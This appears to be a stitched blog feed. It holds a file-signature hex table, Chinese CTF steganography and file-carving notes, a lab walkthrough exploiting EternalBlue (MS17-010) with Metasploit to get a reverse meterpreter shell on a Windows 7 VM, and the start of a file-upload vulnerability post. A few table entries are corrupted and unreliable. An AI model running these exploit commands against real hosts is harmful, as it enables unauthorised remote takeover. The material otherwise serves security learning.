dat | 41 56 47 36 5F 49 6E 74 65 67 72 69 74 79 5F 44 61 74 61 62 61 73 65 | AVG6 Integrity database file |
DAT | 43 52 45 47 | Windows 9x registry hive |
DAT | 43 6C 69 65 6E 74 20 55 72 6C 43 61 63 68 65 20 4D 4D 46 20 56 65 72 20 | IE History DAT file |
DAT | 45 52 46 53 53 41 56 45 44 41 54 41 46 49 4C 45 | Kroll EasyRecovery Saved Recovery State file |
DAT | 49 6E 6E 6F 20 53 65 74 75 70 20 55 6E 69 6E 73 74 61 6C 6C 20 4C 6F 67 20 28 62 29 | Inno Setup Uninstall Log file |
db | 00 06 15 61 00 00 00 02 00 00 04 D2 00 00 10 00 | Netscape Navigator (v4) database file |
DB | 44 42 46 48 | Palm Zire photo database |
db | 08 | dBASE IV or dBFast configuration file |
db3 | 03 | dBASE III file |
db4 | 04 | dBASE IV data file |
dba | 00 01 42 44 | Palm DateBook Archive file |
dbx | CF AD 12 FE | |
dbx | CF AD 12 FE C5 FD 74 6F | Outlook Express |
dci | 3C 21 64 6F 63 74 79 70 | AOL HTML mail file |
dcx | 3A DE 68 B1 | DCX Graphic File |
DDB | 00 01 00 | |
dib | 42 4D | device-independent bitmap image |
DLL | 4D 5A 90 | |
DMP | 4D 44 4D 50 93 A7 | Windows minidump file |
DMS | 44 4D 53 21 | Amiga DiskMasher compressed archive |
doc | 0D 44 4F 43 | DeskMate Document file |
doc | 12 34 56 78 90 FF | MS Word 6.0 |
doc | 31 BE 00 00 00 AB 00 00 | MS Word for DOS 6.0 |
doc | 7F FE 34 0A | MS Word |
dot; ppt; xla; ppa; pps; pot; msi; sdw; db | D0 CF 11 E0 | MS Office/OLE2 |
doc; dot; xls; xlt; xla; ppt; apr ;ppa; pps; pot; msi; sdw; db | D0 CF 11 E0 A1 B1 1A E1 | MS Compound Document v1 or Lotus Approach APR file |
DPL | 4D 5A 50 | |
DRV | 4D 5A 16 | |
drw | 07 | A common signature and file extension for many drawing programs. |
drw | 01 FF 02 04 03 02 | Micrografx vector graphic file |
ds4 | 4D 47 58 20 69 74 70 64 | Micrografix Designer 4 |
DSN | 4D 56 | CD Stomper Pro label file |
dsp | 23 20 4D 69 63 72 6F 73 6F 66 74 20 44 65 76 6 56C 6F 70 65 72 20 53 74 75 64 69 6F | Microsoft Developer Studio project file |
dss | 02 64 73 73 | Digital Speech Standard (Olympus, Grundig, & Phillips) |
dtd | 07 64 74 32 64 64 74 64 | DesignTools 2D Design file |
dtd | 3C 21 45 4E 54 49 54 59 | XML DTD |
DVR | 44 56 44 | DVR-Studio stream file |
dwg | 41 43 31 | |
dwg | 41 43 31 30 | Generic AutoCAD drawingNOTES on AutoCAD file headers: The 0x41-43-31-30 (AC10) is a generic header, occupying the first four bytes in the file. The next two bytes give further indication about the version or subtype:0x30-32 (02) — AutoCAD R2.50x30-33 (03) — AutoCAD R2.60x30-34 (04) — AutoCAD R90x30-36 (06) — AutoCAD R100x30-39 (09) — AutoCAD R11/R120x31-30 (10) — AutoCAD R13 (subtype 10)0x31-31 (11) — AutoCAD R13 (subtype 11)0x31-32 (12) — AutoCAD R13 (subtype 12)0x31-33 (13) — AutoCAD R14 (subtype 13)0x31-34 (14) — AutoCAD R14 (subtype 14)0x31-35 (15) — AutoCAD R20000x31-38 (18) — AutoCAD R20040x32-31 (21) — AutoCAD R2007 |
Enn (where nn are numbers) | 45 56 46 | EnCase evidence file |
ECO | 2A 50 52 | |
elf | 7F 45 4C 46 01 01 01 00 | ELF Executable |
emf | 01 00 00 00 58 00 00 00 | Extended (Enhanced) Windows Metafile Format, printer spool file |
eml | 44 65 6C 69 76 65 72 79 2D 64 61 74 65 3A | |
EML | 46 72 6F 6D 20 20 20 | A commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail. |
EML | 46 72 6F 6D 20 3F 3F 3F | A commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail. |
EML | 46 72 6F 6D 3A 20 | A commmon file extension for e-mail files. Signatures shown here are for Netscape, Eudora, and a generic signature, respectively. EML is also used by Outlook Express and QuickMail. |
EML | 52 65 63 | |
enc | 00 5C 41 B1 FF | Mujahideen Secrets 2 encrypted file |
enl | [32 byte offset] 40 40 40 20 00 00 40 40 40 40 | EndNote Library File |
eps | 25 21 50 53 | Adobe EPS File |
eps | 25 21 50 53 2D 41 64 6F 62 65 | Postscript |
eps | 25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30 | Adobe encapsulated PostScript file (If this signature is not at the immediate beginning of the file, it will occur early in the file, commonly at byte offset 30) |
EPS | C5 D0 D3 | |
eth | 1A 35 01 00 | GN Nettest WinPharoah capture file |
evt | 30 00 00 00 4C 66 4C 65 | Windows Event Viewer file |
evt | 03 00 00 00 C4 66 C4 56 | |
EVTX | 45 6C 66 46 69 6C 65 00 | Windows Vista event log file |
exe; dll; drv; vxd; sys; ocx; vbx | 4D 5A | Win32 Executable |
exe; dll; drv; vxd; sys; ocx; vbx | 4D 5A | Win16 Executable |
exe; com; 386; ax; acm; sys; dll; drv; flt; fon; ocx; scr; lrc; vxd; cpl; x32 | 4D 5A | Executable File |
EXE, DLL, OCX, OLB, IMM, IME | 4D 5A 90 | |
fli | 00 11 AF | FLIC Animation file |
flt | 00 01 01 | OpenFlight 3D file |
FLT | 4D 5A 90 00 03 00 00 00 | Audition graphic filter file (Adobe) |
FLV | 46 4C 56 01 | Flash video file |
fm | 3C 4D 61 6B 65 72 46 69 6C 65 20 | Adobe FrameMaker file |
fm3 | 00 00 1A 00 07 80 01 00 | Lotus 123 v3 FMT file |
fmt | 20 00 68 00 20 0 | Lotus 123 v4 FMT file |
FNT | 43 48 41 | |
FON | 4D 5A | Font file |
GBC | 87 F5 3E | |
gid | 3F 5F 03 00 | Windows Help Index File |
GID | 4C 4E 02 00 | Windows Help index file |
GIF | 47 49 46 38 | |
gif | 47 49 46 38 37 61 | Graphics interchange format file (GIF 87A) |
gif | 47 49 46 38 39 61 | Graphics interchange format file (GIF89A) |
GTD | 7B 50 72 | |
GX2 | 47 58 32 | Show Partner graphics file (not confirmed) |
gz; tar; tgz | 1F 8B | Gzip Archive File |
gz; tgz | 1F 8B 08 | GZ Compressed File |
hap | 91 33 48 46 | HAP Archive File |
HDMP | 4D 44 4D 50 93 A7 | Windows heap dump file |
hdr | 23 3F 52 41 44 49 41 4E 43 45 0A | adiance High Dynamic Range image file |
HLP | 3F 5F 03 | |
hlp | 3F 5F 03 00 | Windows Help file |
HLP | 4C 4E 02 00 | Windows Help file |
hlp | [7 byte offset] 00 00 FF FF FF FF | Windows Help file |
hqx | 28 54 68 69 73 20 66 69 6C 65 | Macintosh BinHex 4 Compressed Archive |
hqx | 28 54 68 69 73 20 66 69 6C 65 20 6D 75 73 74 20 62 65 20 63 6F 6E 76 65 72 74 65 64 20 77 69 74 68 20 42 69 6E 48 65 78 20 | Macintosh BinHex 4 Compressed Archive |
HTM | 3C 21 44 | |
htm; html | 3C 21 44 4F 43 54 | HyperText Markup Language 3 |
htm; html | 3C 48 54 4D 4C 3E | HyperText Markup Language 2 |
htm; html | 3C 68 74 6D 6C 3E | HyperText Markup Language 1 |
html | 68 74 6D 6C 3E | HTML |
ico | 00 00 01 00 00 | Icon File |
ico | 00 00 01 00 01 00 20 20 | Icon File |
IFF | 46 4F 52 4D | |
IFO | 44 56 44 | DVD info file |
IME | 4D 5A 90 | |
img | 00 01 00 08 00 01 00 01 01 | Ventura Publisher/GEM VDI Image Format Bitmap file |
IMG | 00 FF FF | |
IMM | 4D 5A 90 | |
ind | 41 4F 4C 49 44 58 | AOL client preferences/settings file (MAIN.IND) |
ISO | 43 44 30 30 31 | ISO-9660 CD Disc Image (This signature usually occurs at byte 8001, 8801, or 9001.) |
ivr | 2E 52 45 43 | RealPlayer video file (V11 and later) |
JAR | 4A 41 52 43 53 00 | JARCS compressed archive |
jar | 5F 27 A8 89 | JAR Archive File |
jpg; jpeg | FF D8 FF | |
jpg; jpe; jpeg | FF D8 FF E0 00 | JPG Graphic File |
jpg; jpe; jpeg | FF D8 FF FE 00 | JPG Graphic File |
KGB | 4B 47 42 5F 61 72 63 68 20 2D | KGB archive |
KOZ | 49 44 33 03 00 00 00 | Sprint Music Store audio file (for mobile devices) |
LDB | 42 49 4C | |
lha | 2D 6C 68 35 2D | LHA Compressed |
lha; lzh | [2 byte offset] 2D 6C 68 | Compressed archive file |
LHP | 3F 5F 03 | |
lhp | 3F 5F 03 00 | Windows Help File |
lib | 21 3C 61 72 63 68 3E 0A | Unix archiver (ar) files and Microsoft Program Library Common Object File Format (COFF) |
LIB | 2A 24 20 | |
LIT | 49 54 4F 4C 49 54 4C 53 | Microsoft Reader eBook file |
LNK | 4C 00 00 | |
lnk | 4C 00 00 00 | Windows Shortcut (Link File) |
lnk | 4C 00 00 00 01 14 02 | Windows Link File |
LNK | 4C 00 00 00 01 14 02 00 | Windows shortcut file |
log | 2A 2A 2A 20 20 49 6E 73 74 61 6C 6C 61 74 69 6F 6E 20 53 74 61 72 74 65 64 20 | Symantec Wise Installer log file |
lzh | lh | Lz compression file |
lwp | 57 6F 72 64 50 72 6F | Lotus WordPro v9 |
m3u | 23 45 58 | |
m4a | 00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00 | Apple Lossless Audio Codec file |
m4a; m4v | 00 00 00 20 66 74 79 70 4D 34 41 20 00 00 00 00 | QuickTime M4A/M4V file |
manifest | 3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D | Windows Visual Stylesheet XML file |
MAR | 4D 41 52 31 00 | Mozilla archive |
MAR | 4D 41 52 43 | Microsoft/MSN MARC archive |
MAR | 4D 41 72 30 00 | MAr compressed archive |
max | D0 CF 11 | |
mdb | 00 01 00 00 53 74 61 6E 64 61 72 64 20 4A 65 74 20 44 42 | Microsoft Access file |
mdb; mda; mde; mdt | 53 74 61 6E 64 61 72 64 20 4A | MS Access |
MDF | 00 FF FF | |
mdf | 00 FF FF FF FF FF FF FF FF FF FF 00 00 02 00 01 | Alcohol 120% CD image |
mdf | 01 0F 00 00 | Microsoft SQL Server 2000 database |
MDI | 45 50 | Microsoft Document Imaging file |
MDS | 4D 45 44 | |
MID; MIDI | 4D 54 68 64 | Musical Instrument Digital Interface (MIDI) sound file |
mkv | 1A 45 DF A3 93 42 82 88 6D 61 74 72 6F 73 6B 61 | Matroska stream file |
MLS | 4D 49 4C 45 53 | Milestones v1.0 project management and scheduling software (Also see “MV2C” and “MV214” signatures) |
MLS | 4D 4C 53 57 | Skype localization data file |
MLS | 4D 56 32 31 34 | Milestones v2.1b project management and scheduling software (Also see “MILES” and “MV2C” signatures) |
MLS | 4D 56 32 43 | Milestones v2.1a project management and scheduling software (Also see “MILES” and “MV214” signatures) |
MMF | 4D 4D 4D 44 00 00 | Yamaha Corp. Synthetic music Mobile Application Format (SMAF) for multimedia files that can be played on hand-held devices. |
mny | 00 01 00 00 4D 53 49 53 41 4D 20 44 61 74 61 62 61 73 65 | Microsoft Money file |
MOV | 00 00 0F | |
MOV | 00 00 77 | |
mov | 6D 6F 6F 76 | Quicktime |
mov | 6D 64 61 74 | QuickTime Movie |
mp | 0C ED | Monochrome Picture TIFF bitmap file (unconfirmed) |
MP3 | 49 44 33 | MPEG-1 Audio Layer 3 (MP3) audio file |
MP3 | FF FB 50 | |
mp4 | 00 00 00 18 66 74 79 70 33 67 70 35 | MPEG-4 video files |
MPA | 00 00 01 | |
mpg; mpeg | 00 00 01 B3 | MPEG Movie |
mpg | 00 00 01 BA | MPEG |
MSC | 3C 3F 78 | |
msc | 3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31 2E 30 22 3F 3E 0D 0A 3C 4D 4D 43 5F 43 6F 6E 73 6F 6C 65 46 69 6C 65 20 43 6F 6E 73 6F 6C 65 56 65 72 73 69 6F 6E 3D 22 | Microsoft Management Console Snap-in Control file |
msi | 23 20 | Cerius2 file |
MSV | 4D 53 5F 56 4F 49 43 45 | Sony Memory Stick Compressed Voice file |
NES | 4E 45 53 | |
NLS | C2 20 20 | |
nri | 0E 4E 65 72 6F 49 53 4F | Nero CD Compilation |
ntf | 1A 00 00 | Lotus Notes database template |
nsf; ntf | 1A 00 00 03 00 00 | Lotus Notes Database/Template |
nsf | 1A 00 00 03 00 00 11 00 | Notes Database |
nsf | 1A 00 00 04 00 00 | Lotus Notes database |
ntf | 30 31 4F 52 44 4E 41 4E 43 45 20 53 55 52 56 45 59 20 20 20 20 20 20 20 | National Transfer Format Map File |
obj | 4C 01 | Microsoft Common Object File Format (COFF) relocatable object code file for an Intel 386 or later/compatible processors |
OCX | 4D 5A | ActiveX or OLE Custom Control |
OCX | 4D 5A 90 | |
OLB | 4D 5A | OLE object library |
OLB | 4D 5A 90 | |
org; pfc | 41 4F 4C 56 4D 31 30 30 | AOL personal file cabinet (PFC) file |
pak | 1A 0B | Compressed archive file |
PAT | 47 46 31 50 41 54 43 48 | Advanced Gravis Ultrasound patch file |
PAT | 47 50 41 54 | GIMP (GNU Image Manipulation Program) pattern file |
PBK | 5B 41 44 | |
PCB | 17 A1 50 | |
PCS | 0A 05 01 | |
pcx | 0A nn 01 01 | ZSOFT Paintbrush file(where nn = 0x02, 0x03, or 0x05) |
pcx | 0A 05 01 08 | PC Paintbrush(often associated with Quake Engine games) |
pdb | [11 byte offset] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | Palmpilot Database/Document File |
25 50 44 | ||
pdf; fdf | 25 50 44 46 | Adobe Portable Document Format and Forms Document file |
25 50 44 46 2D 31 2E | Adobe Acrobat | |
PDG | 48 48 02 | |
pf | 11 00 00 00 53 43 43 41 | Windows prefetch file |
pic | 01 00 00 00 01 | Unknown type picture file |
PJT | 00 00 07 | |
PLL | 24 53 6F | |
PNG | 89 50 4E | |
PNG | 89 50 4E 47 | |
png | 89 50 4E 47 0D 0A | PNG Image File |
png | 89 50 4E 47 0D 0A 1A 0A | PNG Image File |
PPC | 52 65 63 | |
PPT | D0 CF 11 | |
ppt | [512 byte offset] 00 6E 1E F0 | PowerPoint presentation subheader (MS Office) |
ppt | [512 byte offset] 0F 00 E8 03 | PowerPoint presentation subheader (MS Office) |
PPZ | 4D 53 43 46 | Powerpoint Packaged Presentation |
prc | 42 4F 4F 4B 4D 4F 42 49 | Palmpilot resource file |
PRG | 23 44 45 | |
ps | 25 21 50 53 2D 41 64 6F 62 65 | Postscript |
PSD | 38 42 50 | |
psd | 38 42 50 53 | Adobe Photoshop image file |
psp | 7E 42 4B 00 | PaintShop Pro Image File |
pst | 21 42 44 4E | Microsoft Outlook Personal Folder file |
pwl | E3 82 85 96 | Windows Password |
qbb | 45 86 00 00 06 00 | Intuit QuickBooks Backup file |
qdf | AC 9E BD 8F | Quicken |
qph | 03 00 00 00 | Quicken price history file |
qt | 6D 64 61 74 | Quicktime Movie File |
qxd | 00 00 49 49 58 50 52 | Quark Express document (Intel & Motorola, respectively) |
qxd | 00 00 4D 4D 58 50 52 | |
ra | 2E 52 4D 46 00 00 00 12 00 | Real Audio file |
ra; ram | 2E 72 61 FD | Real Audio File |
ra | 2E 72 61 FD 00 | RealAudio streaming media file |
RAR | 52 61 72 | |
rar | 52 61 72 21 | RAR Archive File |
RAW | 06 05 00 | |
reg | 52 45 47 45 44 49 54 34 | |
rgb | 01 DA 01 01 00 03 | Silicon Graphics RGB Bitmap |
RM | 2E 52 4D | |
rm; rmvb | 2E 52 4D 46 | Real Media streaming media file |
rpm | ED AB EE DB | RPM Archive File |
RTD | 43 23 2B 44 A4 43 4D A5 48 64 72 | RagTime document file |
RTF | 7B 5C 72 | |
rtf | 7B 5C 72 74 66 | Rich Text Format File |
sav | 24 46 4C 32 40 28 23 29 20 53 50 53 53 20 44 41 54 41 20 46 49 4C 45 | SPSS Data file |
SBV | 46 45 44 46 | (Unknown file type) |
SCH | 2A 76 65 | |
scm | 80 53 43 | |
SH3 | 48 48 47 42 31 | Harvard Graphics presentation file |
SHD | 4B 49 00 00 | Windows 9x printer spool file |
sit | 53 49 54 21 | Stuffit v1 Archive File |
sit | 53 74 75 66 66 49 74 | Stuffit v5 Archive File |
sle | 3A 56 45 52 53 49 4F 4E | Surfplan kite project file |
sle | 41 43 76 | teganos Security Suite virtual secure drive |
sly; srt; slt | 53 52 01 00 | Sage sly.or.srt.or.slt |
SMD | 00 FF FF | |
snm | 00 1E 84 90 00 00 00 00 | Netscape Communicator (v4) mail folder |
SNP | 4D 53 43 46 | Microsoft Access Snapshot Viewer file |
sol | 00 BF | Adobe Flash shared object file (e.g., Flash cookies) |
spl | 00 00 01 00 | Windows NT/2000/XP printer spool file |
SCR | 4D 5A | Screen saver |
SUB | FF FF FF | |
SWF | 43 57 53 | Shockwave Flash file (v5+) |
SWF | 46 57 53 | Macromedia Shockwave Flash player file |
sxc | calc | OpenOffice Calc |
sxd | draw | OpenOffice Draw |
sxi | impress | OpenOffice Impress |
sxm | math | OpenOffice Math |
sxw | writer | OpenOffice Writer |
syw | 41 4D 59 4F | Harvard Graphics symbol graphic |
TAG | 00 00 02 | |
tar; cpio | 30 37 30 37 30 37 | CPIO Archive File |
tar.z | 1F 9D 90 | Compressed tape archive file |
tga | 00 00 10 00 00 | RLE压缩的前5字节 |
TGA | 00 00 02 | |
tga | 00 00 02 00 00 | 未压缩的前5字节 |
TIF; TIFF | 49 20 49 | Tagged Image File Format file |
tif; tiff | 49 49 2A | TIFF (Intel) |
tif; tiff | 49 49 2A 00 | Tagged Image File Format file (little endian, i.e., LSB first in the byte; Intel) |
TIF; TIFF | 4D 4D 00 2A | Tagged Image File Format file (big endian, i.e., LSB last in the byte; Motorola) |
tif; tiff | 4D 4D 2A | TIFF (Motorola) |
TIF; TIFF | 4D 4D 00 2B | BigTIFF files; Tagged Image File Format files >4 GB |
TLB | 4D 53 46 54 02 00 01 00 | OLE, SPSS, or Visual C++ type library file |
tr1 | 01 10 | Novell LANalyzer capture file |
TST | 00 01 00 | |
TTF | 00 01 00 | |
ufa | 55 46 41 | UFA Archive File |
VBX | 4D 5A | VisualBASIC application |
VCD | 45 4E 54 52 59 56 43 44 02 00 00 01 02 00 18 58 | VideoVCD (GNU VCDImager) file |
vcf | 42 45 47 49 4E 3A 56 43 41 52 44 0D 0A | vCard file |
vob | 00 00 01 BA | DVD Video Movie File (video/dvd, video/mpeg) |
VXD, 386 | 4D 5A | Windows virtual device drivers |
WAV | 52 49 46 | |
wav | 57 41 56 45 | Wave |
wav | 57 41 56 45 66 6D 74 | Wave Files |
wb2 | 00 00 02 00 | QuattroPro for Windows Spreadsheet file |
wb3 | [24 byte offset] 3E 00 03 00 FE FF 09 00 06 | Quatro Pro for Windows 7.0 Notebook file |
wk1; wks | 20 00 60 40 60 | Lotus 123 v1 Worksheet |
wk1 | 00 00 02 00 06 04 06 00 08 00 00 00 00 00 | Lotus 1-2-3 spreadsheet (v1) file |
wk3 | 00 00 1A 00 00 10 04 00 | Lotus 123 spreadsheet (v3) file |
wk4; wk5 | 00 00 1A 00 02 10 04 00 | Lotus 1-2-3 spreadsheet (v4, v5) file |
wks | 0E 57 4B 53 | DeskMate Worksheet |
WMA | 30 26 B2 | |
wmf | 01 00 09 00 | Graphics Metafile |
wmf | 01 00 09 00 00 03 | Windows Metadata file (Win 3.x format) |
wmf | 02 00 09 00 | Graphics Metafile |
wmf | D7 CD C6 9A | Windows Meta File |
WMV | 30 26 B2 | |
wp | FF 57 50 43 | WordPerfect v5 or v6 |
wpd | FF 57 50 43 | WordPerfect |
wpg | FF 57 50 47 | WordPerfect Graphics |
wri | 31 BE | Microsoft Write file |
WRI | 31 BE 00 | |
wri | 32 BE | Microsoft Write file |
ws | 1D 7D | WordStar Version 5.0/6.0 document |
XBE | 58 42 45 | |
xdr | 3C | BizTalk XML-Data Reduced Schema file |
xls | 09 02 06 00 00 00 10 00 B9 04 5C 00 | MS Excel v2 |
xls | 09 04 06 00 00 00 10 00 F6 05 5C 00 | MS Excel v4 |
XLS | D0 CF 11 | |
xls | D0 CF 11 E0 | MS Excel |
xls | [512 byte offset] 09 08 10 00 00 06 05 00 | Excel spreadsheet subheader (MS Office) |
XML | 3C 3F 78 | |
xml | 3C 3F 78 6D 6C | XML Document |
xml | FF FE 3C 00 52 00 4F 00 4F 00 54 00 53 00 54 00 55 00 42 00 | XML Document (ROOTSTUB) |
XMV | 00 50 01 | |
XSL | FF FE 3C | |
xul | 72 73 69 6F 6E 3D 22 31 3C 3F 78 6D 6C 20 76 65 2E 30 22 3F 3E | XML User Interface Language file |
z | 1F 9D | TAR Compressed Archive File |
Z | 1F 9D 8C | |
ZIP | 50 4B 03 | |
zip; jar; zipx | 50 4B 03 04 | ZIP Archive |
zip | 50 4B 30 30 | ZIP Archive (outdated) |
Zip | 50 4B 30 30 50 4B 03 04 | WINZIP Compressed |
zoo | 5A 4F 4F 20 | ZOO Archive File |
字符串附加在文件的后面是因为,如果图片附加在中间,可能破坏图片的信息;如果附加在图片的头部位置,又破坏了文件头。基于此点,也可以使用16进制编辑器找到这一串字符串。
分离方法:
-a --all
:扫描整个文件而不是只扫描目标文件初始化和装载段
-f –print-file-name
:在显示字符串前先显示文件名
-t --radix={o,d,x}
:输出字符的位置,基于八进制,十进制或者十六进制
-e --encoding={s,S,b,l,B,L}
:选择字符大小和排列顺序:s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
分离命令:(cmd)
strings xxx.jpg
使用WinHex查看图片源码或查看图片属性。
将图片后缀名改为.zip\rar\7z
等压缩格式后打开。
以cmd命令行copy /b 1.jpg+2.jpg 3.jgp
以二进制方式连接两个图片。
分析方法:
使用binwalk工具分析图片,可以发现从35786块偏移开始有另一张jpg图片。(win下安装binwalk:python setup.py install
):
C:\Python27\Scripts>python binwalk 3.jpg
分离方法:
jpg格式文件开始的2字节是FF D8,之后2个字节是FF E0 ,最后2个字节是图像文件结束标记为FF D9 。我们打开3.jpg,Alt+A全选图片16进制数值,菜单—搜索—十六进制数值—填入FFD8—取消统计次数—勾选列出搜索结果,定位到第二个FFD8处(或使用Alt+G快捷键定位到35786处),使用Alt+1快捷键选取FF为开始块,Alt+2选取D9为结束块,然后右键—Edit—Copy Block—Into New File保存.jpg后缀的文件。得到隐藏图片:
foremost是一个基于文件文件头和尾部信息以及文件的内建数据结构恢复文件的命令行工具。
分离命令:
foremost xxx.jpg
会自动生成output目录存放分离出文件。
使用命令 copy /b 1.jpg + 1.zip 2.jpg
,利用copy命令将两个文件以二进制方式连接起来。在jpg中结束符是FF D9,图片查看器会忽视jpg结束符之后的内容,所以附加的zip不会影响到图像的正常显示。
分离方法:
50 4B 03 04就是ZIP文件的文件头,一般以PK表示。
选取以50开头以及到末尾的的数据,右键单击,选择编辑,复制选块到新文件,保存新文件为zip格式命名规则即可。
具体操作同上。
标准的PNG文件结构包括:PNG文件标识和PNG数据块。
PNG图片文件结构:
(固定)8字节89 50 4E 47 0D 0A 1A 0A为png文件头;
(固定)4字节00 00 00 0D(即十进制的13)代表数据块的长度为13;
(固定)4字节49 48 44 52(即为ASCII码的IHDR)是文件头数据块的标识(IDCH);
(可变)13位数据块(IHDR)
前四个字节代表该图片的宽
后四个字节代表该图片的高
后五个字节依次为:
Bit depth、ColorType、Compression method、Filter method、Interlace method
(可变)剩余四字节为该png的CRC检验码,由从IDCH到IHDR的十七位字节进行crc计算得到。
PNG图片文件头数据块(IHDR)包括:宽、高、图像深度、颜色类型、压缩方法等(图中蓝色的部分即IHDR数据块)。
先用TweakPNG打开图片,一般修改过长宽的图片都会报错。
找到PNG图片高度值所对应的位置,并修改为一个较大的值,尝试打开。
修改01 00为02 00,并保存后打开。
修改宽高之后的PNG图片可能打不开,需要修复PNG图片的CRC校验值。
方法:
选中PNG的struct IHDR Ihdr部分(图中蓝色部分),使用CRC Calculator重新计算CRC校验值。
将struct IHDR Ihdr的CRC(图中蓝色部分)修改为重新计算过的CRC。
再用TweakPNG打开图片不报错,修复成功。
PNGCheck可以验证PNG图片的完整性(通过检查内部CRC-32校验和&bra;比特&ket;)和解压缩图像数据,它能够转储几乎所有任选的块级别信息在该图像中的可读数据。
查询命令:
pngcheck -v xxx.png
利用LSB(最低有效位 (Least Significant Bit)来进行隐写。例如在PNG图片的储存中,每个颜色会有8bit,LSB隐写就是修改了像数中的最低的1bit,人眼无法区别。例如我们想把A隐藏进来的话,可以把A转成16进制的0x61再转成二进制的01100001,再修改为红色通道的最低位为这些二进制串。
分离方法:
使用Stegsolve—Analyse—Frame Browser,可以浏览三个颜色通道中的每一位。
此种隐写的载体一般为png或bmp格式,jpg的有损压缩方式会破坏隐写的内容。
JPEG图像格式使用离散余弦变换(Discrete Cosine Transform,DCT)函数来压缩图像,而这个图像压缩方法的核心是:通过识别每个8×8像素块中相邻像素中的重复像素来减少显示图像所需的位数,并使用近似估算法降低其冗余度。因此,我们可以把DCT看作一个用于执行压缩的近似计算方法。
因为丢失了部分数据,所以DCT是一种有损压缩(Loss Compression)技术,但一般不会影响图像的视觉效果。
在这个隐写家族中,常见的隐写方法有JSteg、JPHide、Outguess、F5等等,分离方法为Stegdetect。
Stegdetect可以检测到通过JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX和Camouflage等这些隐写工具隐藏的信息,并且还具有基于字典暴力破解密码方法提取通过Jphide、outguess和jsteg-shell方式嵌入的隐藏信息。
Stegdetect参数:
Stegdetect会在检测结果后面使用1~3颗星来标识隐藏信息存在的可能性大小,3颗星表示隐藏信息存在的可能性最大。
Stegdetect命令(cmd):
stegdetect.exe -tjopi -s 100.0 xxx.jpg
使用Stegdetect探测jpg隐藏种类。
使用JPHS打开图片,点击Seek功能,会弹出一个密码的输入框,这里默认为空口令,点击OK,将提取出来的信息保存为flag.txt。
使用Stegdetect探测jpg隐藏种类。
点击Enter key功能,输入密码,这里我隐写的时候,使用的密码是123456
点击Load image 加载目标图片
点击Extract file功能,将提取出来的信息保存成flag.txt文件。
数字水印(digital watermark)技术,是指在数字化的数据内容中嵌入不明显的记号。
特征是,被嵌入的记号通常是不可见或不可察的,但是可以通过计算操作检测或者提取。
盲水印,是指人感知不到的水印,包括看不到或听不见(没错,数字盲水印也能够用于音频)。其主要应用于音像作品、数字图书等,目的是,在不破坏原始作品的情况下,实现版权的防护与追踪。
对图像进行傅里叶变换,起始是一个二维离散傅里叶变换,图像的频率是指图像灰度变换的强烈程度,将二维图像由空间域变为频域后,图像上的每个点的值都变成了复数,也就是所谓的复频域,通过复数的实部和虚部,可以计算出幅值和相位,计算幅值即对复数取模值,将取模值后的矩阵显示出来,即为其频谱图。但是问题来了,复数取模后,数字有可能变的很大,远大于255,如果数据超过255,则在显示图像的时候会都当做255来处理,图像就成了全白色。因此,一般会对模值再取对数,在在0~255的范围内进行归一化,这样才能够准确的反映到图像上,发现数据之间的差别,区分高频和低频分量,这也是进行傅里叶变换的意义。
分离方法:
分离水印命令:
python decode.py --original <original image file> --image <image file> --result <result file>
添加水印命令:
python encode.py --image <image file> --watermark <watermark file> --result <result file>
容差,在选取颜色时所设置的选取范围,容差越大,选取的范围也越大,其数值是在0-255之间。
分离方法:
操作步骤:
打开工具,选择图片比较,导入example_1.jpg和example_2.jpg。
选择容差模式,并调整容差大小
使用QR Research读取二维码中的信息。
使用python脚本,10组合的将字符串解码成flag.png。
]]>Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
攻击机:Linux Kali (192.168.8.242)
靶机:Windows7 x64 (192.168.8.172)
用nmap探测本网段存活主机 nmap 192.168.8.17
探测到存活主机ip,并探测到开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。
执行msfconsole
ms17-010代码 msf6 > search ms17_010
在这里可以看到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,前者扫描漏洞,后者进行攻击。
msf6 > use auxiliary/scanner/smb/smb_ms17_010
查看模块需要配置的参数 show options
在Required一栏中显示yes的需要填写Current Setting项
如 set rhosts 192.168.8.172
执行扫描 run
显示可能存有永恒之蓝漏洞。
msf6 > use exploit/windows/smb/ms17_010_eternalblue
查看模块需要配置的参数 show options
同理,设置目标IP :set rhosts 192.168.8.172
设置用于接收从目标机弹回来的shell:set LHOST 192.168.1.11
执行攻击 run
使用shell
可以进入被攻击机的Windows shell,但会有乱码。使用chcp 65001
,改变代码页(65001为UTF-8的代码页)即恢复正常。
使用screenshot
进行截屏
想从目标主机shell退出到 meterpreter ,输入:exit
要想从 meterpreter 退出到MSF框架,输入:background
1 | sysinfo #查看目标主机系统信息 |
1 | run post/windows/manage/migrate #自动进程迁移 |
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
(API链接在后面)
